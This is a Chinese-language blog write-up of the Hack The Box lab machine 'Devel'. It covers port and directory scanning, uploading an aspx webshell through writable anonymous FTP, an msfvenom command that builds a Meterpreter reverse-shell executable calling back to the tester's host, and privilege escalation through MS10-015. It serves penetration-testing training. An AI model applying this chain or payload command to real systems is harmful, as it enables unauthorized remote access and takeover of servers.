Geekby's Blog
文章 标签 分类 关于
Geekby's Blog

目录

Hack The Box —— Devel

 收录于 靶场
   约 106 字   预计阅读 1 分钟 

Hack The Box —— Devel

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814162131.png-water_print

信息搜集

nmap

1

nmap -T4 -A -v 10.10.10.5

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814162312.png-water_print

发现服务器开了 21 端口和 80 端口,同时 ftp 服务可以匿名访问,但是不知道版本号。浏览器访问 http 服务,发现 只有 iis 的默认页面。

目录扫描

利用 dirsearch 工具扫描一波目录:

1

python3 dirsearch -u http://10.10.10.5 -e html

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814162625.png-water_print

并未有什么特殊的发现。

FTP

匿名访问 FTP 服务,发现当前目录下有写权限,所以,想通过上传 webshell 的方式获取服务器的权限。

漏洞利用

webshell

首先上传 aspx 的 webshell:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814163112.png-water_print

浏览器访问,发现 webshell 未报错,可以执行。

用蚁剑链接:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814163228.png-water_print

访问一些目录,发现权限不足。

利用蚁剑的虚拟终端,执行 whoami ,发现只有 iis user 的权限,遂想办法提权。

权限提升

利用 msfvenom 生成 exe 木马文件,使用 msf 接收到回连的 shell,方便提权。

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe > shell.exe

然后将生成的 shell.exe 文件通过蚁剑上传到目标服务器上,并通过虚拟终端执行。

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814164149.png-water_print

使用 msf 监听端口,接收回连的 shell :

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814164258.png-water_print

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814165547.png-water_print

使用 msf 自带的检测脚本,查看可能用于提权的漏洞:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814164414.png-water_print

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814170651.png-water_print

经过一个一个的测试:发现 ms10-015可以用来提权。

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814164518.png-water_print

成功创建了一个新的 session.

在 meterpreter 下执行 getuid 命令:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190814170812.png-water_print

发现成功提权。

接下来就可以 type c:\users\Administrator\Desktop\root.txt.txt 获取 flag 了。

更新于 2019-08-14
 HTB靶场
返回 | 主页